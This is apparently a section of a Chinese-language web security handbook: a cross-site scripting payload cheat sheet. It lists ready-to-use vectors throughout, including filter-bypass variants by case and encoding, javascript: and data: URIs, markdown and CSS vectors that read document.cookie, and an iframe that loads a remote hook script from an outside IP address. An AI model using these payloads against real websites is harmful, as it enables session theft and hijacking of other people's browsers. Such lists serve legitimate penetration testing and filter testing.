4.2.10. Payload

4.2.10.1. 常用

  • <script>alert(/xss/)</script>
  • <svg onload=alert(document.domain)>
  • <img src=document.domain onerror=alert(document.domain)>
  • <M onmouseover=alert(document.domain)>M
  • <marquee onscroll=alert(document.domain)>
  • <a href=javascript:alert(document.domain)>M</a>
  • <body onload=alert(document.domain)>
  • <details open ontoggle=alert(document.domain)>
  • <embed src=javascript:alert(document.domain)>

4.2.10.2. 大小写绕过

  • <script>alert(1)</script>
  • <sCrIpT>alert(1)</sCrIpT>
  • <ScRiPt>alert(1)</ScRiPt>
  • <sCrIpT>alert(1)</ScRiPt>
  • <ScRiPt>alert(1)</sCrIpT>
  • <img src=1 onerror=alert(1)>
  • <iMg src=1 oNeRrOr=alert(1)>
  • <ImG src=1 OnErRoR=alert(1)>
  • <img src=1 onerror="alert(&quot;M&quot;)">
  • <marquee onscroll=alert(1)>
  • <mArQuEe OnScRoLl=alert(1)>
  • <MaRqUeE oNsCrOlL=alert(1)>

4.2.10.3. 各种alert

4.2.10.4. 伪协议

  • <a href=javascript:/0/,alert(%22M%22)>M</a>
  • <a href=javascript:/00/,alert(%22M%22)>M</a>
  • <a href=javascript:/000/,alert(%22M%22)>M</a>
  • <a href=javascript:/M/,alert(%22M%22)>M</a>

4.2.10.5. Chrome XSS auditor bypass

4.2.10.6. 长度限制

  1. <script>s+="l"</script>
  2. \...
  3. <script>eval(s)</script>

4.2.10.7. jquery sourceMappingURL

</textarea><script>var a=1//@ sourceMappingURL=//xss.site</script>

4.2.10.8. 图片名

"><img src=x onerror=alert(document.cookie)>.gif

4.2.10.9. 过期的payload

  • src=javascript:alert基本不可以用
  • css expression特性只在旧版本ie可用

4.2.10.10. css

  1. <div style="background-image:url(javascript:alert(/xss/))">
  2. <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

4.2.10.11. markdown

  1. [a](javascript:prompt(document.cookie))
  2. [a](j a v a s c r i p t:prompt(document.cookie))
  3. <&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
  4. ![a'"`onerror=prompt(document.cookie)](x)
  5. [notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
  6. [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=)
  7. ![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=)

4.2.10.12. iframe

  1. <iframe onload='
  2. var sc = document.createElement("scr" + "ipt");
  3. sc.type = "text/javascr" + "ipt";
  4. sc.src = "http://1.2.3.4/js/hook.js";
  5. document.body.appendChild(sc);
  6. '
  7. />
  • <iframe src=javascript:alert(1)></iframe>
  • <iframe src="data:text/html,<iframe src=javascript:alert('M')></iframe>"></iframe>
  • <iframe src=data:text/html;base64,PGlmcmFtZSBzcmM9amF2YXNjcmlwdDphbGVydCgiTWFubml4Iik+PC9pZnJhbWU+></iframe>
  • <iframe srcdoc=<svg/o&#x6E;load&equals;alert&lpar;1)&gt;></iframe>
  • <iframe src=https://baidu.com width=1366 height=768></iframe>
  • <iframe src=javascript:alert(1) width=1366 height=768></iframe

4.2.10.13. form

  • <form action=javascript:alert(1)><input type=submit>
  • <form><button formaction=javascript:alert(1)>M
  • <form><input formaction=javascript:alert(1) type=submit value=M>
  • <form><input formaction=javascript:alert(1) type=image value=M>
  • <form><input formaction=javascript:alert(1) type=image src=1>

4.2.10.14. meta

<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css&gt;; REL=stylesheet">